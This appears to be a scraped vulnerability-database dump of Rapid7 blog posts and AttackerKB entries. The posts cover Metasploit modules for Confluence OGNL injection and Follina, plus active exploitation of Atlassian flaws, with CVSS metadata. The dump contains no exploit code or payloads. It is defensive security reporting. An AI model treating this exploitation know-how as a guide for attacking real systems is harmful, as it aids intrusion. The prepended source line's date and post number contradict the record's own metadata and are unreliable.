[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).

Source record: Rapid7 blog, "Metasploit Wrap-Up", published 2021-10-22, https://blog.rapid7.com/2021/10/22/metasploit-wrap-up-135/. CVSS 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P).

# Metasploit Weekly Wrap-Up

## A Confluence of High-Profile Modules

This release features modules covering the Confluence remote code execution bug CVE-2022-26134 and the hotly-debated CVE-2022-30190, a file format vulnerability in the Windows operating system accessible through malicious documents. Both have been all over the news, and we're very happy to bring them to you so that you can verify mitigations and patches in your infrastructure. If you'd like to read more about these vulnerabilities, Rapid7 has AttackerKB analyses and blogs covering both Confluence CVE-2022-26134 ([AttackerKB](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>)) and Windows CVE-2022-30190 ([AttackerKB](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/>)).

## Metasploit 6.2

While we release new content weekly (or in real time if you are using GitHub), we track milestones as well.
This week, we released Metasploit 6.2, and it has a whole host of [new functionality, exploits, and fixes](<https://www.rapid7.com/blog/post/2022/06/09/announcing-metasploit-6-2/>).

## New module content (2)

* [Atlassian Confluence Namespace OGNL Injection](<https://github.com/rapid7/metasploit-framework/pull/16644>) by Spencer McIntyre, Unknown, bturner-r7, and jbaines-r7, which exploits [CVE-2022-26134](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>) - This module exploits an OGNL injection in Atlassian Confluence servers (CVE-2022-26134). A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.
* [Microsoft Office Word MSDTJS](<https://github.com/rapid7/metasploit-framework/pull/16635>) by mekhalleh (RAMELLA Sébastien) and nao sec, which exploits [CVE-2022-30190](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190?referrer=blog>) - This PR adds a module supporting CVE-2022-30190 (AKA Follina), a Windows file format vulnerability.

## Enhancements and features (2)

* [#16651](<https://github.com/rapid7/metasploit-framework/pull/16651>) from [red0xff](<https://github.com/red0xff>) - The `test_vulnerable` methods in the various SQL injection libraries have been updated so that they will now use the specified encoder if one is specified, ensuring that characters are appropriately encoded as needed.
* [#16661](<https://github.com/rapid7/metasploit-framework/pull/16661>) from [dismantl](<https://github.com/dismantl>) - The impersonate_ssl module has been enhanced to allow it to add Subject Alternative Names (SAN) fields to the generated SSL certificate.

## Bugs fixed (4)

* [#16615](<https://github.com/rapid7/metasploit-framework/pull/16615>) from [NikitaKovaljov](<https://github.com/NikitaKovaljov>) - A bug has been fixed in the IPv6 library when creating solicited-multicast addresses by finding leading zeros in the last 16 bits of the link-local address and removing them.
* [#16630](<https://github.com/rapid7/metasploit-framework/pull/16630>) from [zeroSteiner](<https://github.com/zeroSteiner>) - The `auxiliary/server/capture/smb` module no longer stores duplicate Net-NTLM hashes in the database.
* [#16643](<https://github.com/rapid7/metasploit-framework/pull/16643>) from [ojasookert](<https://github.com/ojasookert>) - The `exploits/multi/http/php_fpm_rce` module has been updated to be compatible with Ruby 3.0 changes.
* [#16653](<https://github.com/rapid7/metasploit-framework/pull/16653>) from [adfoster-r7](<https://github.com/adfoster-r7>) - This PR fixes an issue where named pipe pivots failed to establish the named pipes in intermediate connections.

## Get it

As always, you can update to the latest Metasploit Framework with `msfupdate`
and you can get more details on the changes since the last blog post from
GitHub:

* [Pull Requests 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-06-02T11%3A20%3A37-04%3A00..2022-06-09T09%3A41%3A47-05%3A00%22>)
* [Full diff 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/compare/6.2.1...6.2.2>)

If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T18:07:05", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-30190"], "modified": "2022-06-10T18:07:05", "id": "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "href": "https://blog.rapid7.com/2022/06/10/metasploit-weekly-wrap-up-161/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-10T18:59:32", "description": "## Confluence Server OGNL Injection\n\nOur own [wvu](<https://github.com/wvu-r7>) along with [Jang](<https://twitter.com/testanull>) added a module that exploits an OGNL injection ([CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection>)) in Atlassian Confluence's 
WebWork component to execute commands as the Tomcat user. CVE-2021-26084 is a critical remote code execution vulnerability in Confluence Server and Confluence Data Center and is actively being exploited in the wild. Initial discovery of this exploit was by Benny Jacob (SnowyOwl).\n\n## More Enhancements\n\nIn addition to the module, we would like to highlight some of the enhancements that have been added for this release. Contributor [e2002e](<https://github.com/e2002e>) added the `OUTFILE` and `DATABASE` options to the `zoomeye_search` module, allowing users to save results to a local file or local database, along with improving the output of the module to provide better information about the target. Our own [dwelch-r7](<https://github.com/dwelch-r7>) has added support for fully interactive shells against Linux environments with `shell -it`. In order to use this functionality, users will have to enable the feature flag with `features set fully_interactive_shells true`. Contributor [pingport80](<https://github.com/pingport80>) has added `powershell` support for the `write_file` method that is binary safe and has also replaced explicit `cat` calls with file reads from the file library to provide broader support.\n\n## New module content (1)\n\n * [Atlassian Confluence WebWork OGNL Injection](<https://github.com/rapid7/metasploit-framework/pull/15645>) by [wvu](<https://github.com/wvu-r7>), [Benny Jacob](<https://twitter.com/bennyyjacob>), and [Jang](<https://twitter.com/testanull>), which exploits [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection?referrer=blog>) \\- This adds an exploit module targeting an OGNL injection vulnerability (CVE-2021-26084) in Atlassian Confluence's WebWork component to execute commands as the Tomcat user.\n\n## Enhancements and features\n\n * [#15278](<https://github.com/rapid7/metasploit-framework/pull/15278>) from [e2002e](<https://github.com/e2002e>) \\- The `zoomeye_search` module 
has been enhanced to add the `OUTFILE` and `DATABASE` options, which allow users to save results to a local file or to the local database respectively. Additionally, the output saved has been improved to provide better information about the target, and additional error handling has been added to better handle potential edge cases.\n * [#15522](<https://github.com/rapid7/metasploit-framework/pull/15522>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Adds support for fully interactive shells against Linux environments with `shell -it`. This functionality is behind a feature flag and can be enabled with `features set fully_interactive_shells true`.\n * [#15560](<https://github.com/rapid7/metasploit-framework/pull/15560>) from [pingport80](<https://github.com/pingport80>) \\- This PR adds PowerShell support for the `write_file` method that is binary safe.\n * [#15627](<https://github.com/rapid7/metasploit-framework/pull/15627>) from [pingport80](<https://github.com/pingport80>) \\- This PR removes explicit `cat` calls and replaces them with file reads from the file library so that they have broader support.\n\n## Bugs fixed\n\n * [#15634](<https://github.com/rapid7/metasploit-framework/pull/15634>) from [maikthulhu](<https://github.com/maikthulhu>) \\- This PR fixes an issue in `exploit/multi/misc/erlang_cookie_rce` where a missing bitwise flag caused the exploit to fail in some circumstances.\n * [#15636](<https://github.com/rapid7/metasploit-framework/pull/15636>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a regression in datastore serialization that caused some event processing to fail.\n * [#15637](<https://github.com/rapid7/metasploit-framework/pull/15637>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a regression where Metasploit incorrectly marked IPv6 addresses as having an 'invalid protocol'.\n * [#15639](<https://github.com/rapid7/metasploit-framework/pull/15639>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- 
This fixes a bug in the `rename_files` method that would occur when run on a non-Windows shell session.\n * [#15640](<https://github.com/rapid7/metasploit-framework/pull/15640>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Updates `modules/auxiliary/gather/office365userenum.py` to require python3\n * [#15652](<https://github.com/rapid7/metasploit-framework/pull/15652>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- A missing dependency, `py3-pip`, was preventing certain external modules such as `auxiliary/gather/office365userenum` from working due to `requests` requiring `py3-pip` to run properly. This has been fixed by updating the Docker container to install the missing `py3-pip` dependency.\n * [#15654](<https://github.com/rapid7/metasploit-framework/pull/15654>) from [space-r7](<https://github.com/space-r7>) \\- A bug has been fixed in `lib/msf/core/payload/windows/encrypted_reverse_tcp.rb` whereby a call to `recv()` was not being passed the proper arguments to receive the full payload before returning. This could result in cases where only part of the payload was received before continuing, which would have resulted in a crash. 
This has been fixed by adding a flag to the `recv()` function call to ensure it receives the entire payload before returning.\n * [#15655](<https://github.com/rapid7/metasploit-framework/pull/15655>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This cleans up the MySQL client-side options that are used within the library code.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.3...6.1.5](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-09-02T10%3A13%3A16-05%3A00..2021-09-08T18%3A07%3A57-05%3A00%22>)\n * [Full diff 6.1.3...6.1.5](<https://github.com/rapid7/metasploit-framework/compare/6.1.3...6.1.5>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-10T18:32:40", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-26804"], "modified": "2021-09-10T18:32:40", "id": "RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "href": "https://blog.rapid7.com/2021/09/10/metasploit-wrap-up-129/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-29T21:59:42", "description": "\n\nExploitation is underway for one of the [trio of critical Atlassian vulnerabilities](<https://confluence.atlassian.com/security/july-2022-atlassian-security-advisories-overview-1142446703.html>) that were published last week affecting several of the company\u2019s on-premises products. Atlassian has been a focus for attackers, as it was less than two months ago that we observed exploitation of [CVE-2022-26134 in Confluence Server and Confluence Data Center](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>).\n\n**CVE-2022-26138: Hardcoded password in Questions for Confluence app impacting:**\n\n * Confluence Server\n * Confluence Data Center\n\n**CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities impacting:**\n\n * Bamboo Server and Data Center\n * Bitbucket Server and Data Center\n * Confluence Server and Data Center\n * Crowd Server and Data Center\n * Crucible\n * Fisheye\n * Jira Server and Data Center\n * Jira Service Management Server and Data Center\n\n## CVE-2022-26138: Hardcoded password in Questions for Confluence app\n\nThe most critical of these three is [CVE-2022-26138](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), as it was quickly exploited in the wild once the hardcoded password was released on social 
media. There is a limiting function here, however, as this vulnerability only exists when the Questions for Confluence app is enabled (and does not impact the Confluence Cloud instance). Once the app is enabled on affected versions, it will create a user account with a hardcoded password and add the account to a user group, which allows access to all non-restricted pages in Confluence. This easily allows a remote, unauthenticated attacker to browse an organization\u2019s Confluence instance. Unsurprisingly, it didn\u2019t take long for Rapid7 to observe exploitation once the hardcoded credentials were released, given the high value of Confluence for attackers who often jump on Confluence vulnerabilities to execute ransomware attacks.\n\n## Affected versions\n\n * Questions for Confluence 2.7.x\n   * 2.7.34\n   * 2.7.35\n * Questions for Confluence 3.0.x\n   * 3.0.2\n\n## Mitigation guidance\n\nOrganizations using on-prem Confluence should follow Atlassian\u2019s guidance on updating their instance or disabling/deleting the account. Rapid7 recommends organizations impacted by this take steps immediately to mitigate the vulnerability. Atlassian\u2019s advisory also includes information on how to look for evidence of exploitation. 
An [FAQ](<https://confluence.atlassian.com/kb/faq-for-cve-2022-26138-1141988423.html>) has also been provided.\n\n> Please note: Atlassian\u2019s [Questions For Confluence Security Advisory 2022-07-20](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>) has a very important call-out that \u201cuninstalling the Questions for Confluence app does not remediate this vulnerability.\u201d\n\n## CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities\n\nTwo other vulnerabilities were announced at the same time, [CVE-2022-26136 and CVE-2022-26137](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>), which are also rated critical by Atlassian. They both are issues with Servlet Filters in Java and can be exploited by remote, unauthenticated attackers. Cloud versions of Atlassian have already been fixed by the company.\n\nThe list of affected versions is long and can be found on [Atlassian\u2019s Security Advisory](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>).\n\nWhile the impact of these vulnerabilities will vary by organization, as mentioned above, attackers place a high value on many Atlassian products. 
Therefore, Rapid7 recommends that organizations update impacted product versions as there is no mitigation workaround available.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-26138 with a remote vulnerability check released on July 29, 2022 (ContentOnly-content-1.1.2602-202207292027).\n\n## Updates\n\n07/29/2022 - 5:30 PM EDT \nUpdated Rapid7 customers section to include information on a new remote vulnerability check.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T19:26:38", "type": "rapid7blog", "title": "Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-26136", "CVE-2022-26137", "CVE-2022-26138"], "modified": "2022-07-27T19:26:38", "id": "RAPID7BLOG:C45DEEA0736048FF17FF9A53E337C92D", "href": "https://blog.rapid7.com/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/", "cvss": {"score": 
7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-08T15:44:47", "description": "\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the ****Export to PDF ****button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\n\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. 
She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. 
In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in[ Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack 
Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-08T13:30:00", "type": "rapid7blog", "title": "What's New in InsightVM: Q3 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-22005", 
"CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "modified": "2021-10-08T13:30:00", "id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-08-03T22:59:55", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.\n\n \n**Recent assessments:** \n \n**jbaines-r7** at June 03, 2022 7:21pm UTC reported:\n\nCVE-2022-26134 is an unauthenticated and remote OGNL injection that is trivial to exploit. 
See the Rapid7 analysis for additional details.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-13T00:00:00", "type": "attackerkb", "title": "CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", "CVE-2022-26314"], "modified": "2022-07-13T00:00:00", "id": "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "href": "https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-17T23:03:20", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if \u2018Allow people to sign up to create their account\u2019 is enabled. 
To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 02, 2021 1:27am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. 
:)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-26084 Confluence Server OGNL injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-04T00:00:00", "id": "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "href": "https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-27T04:44:47", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). 
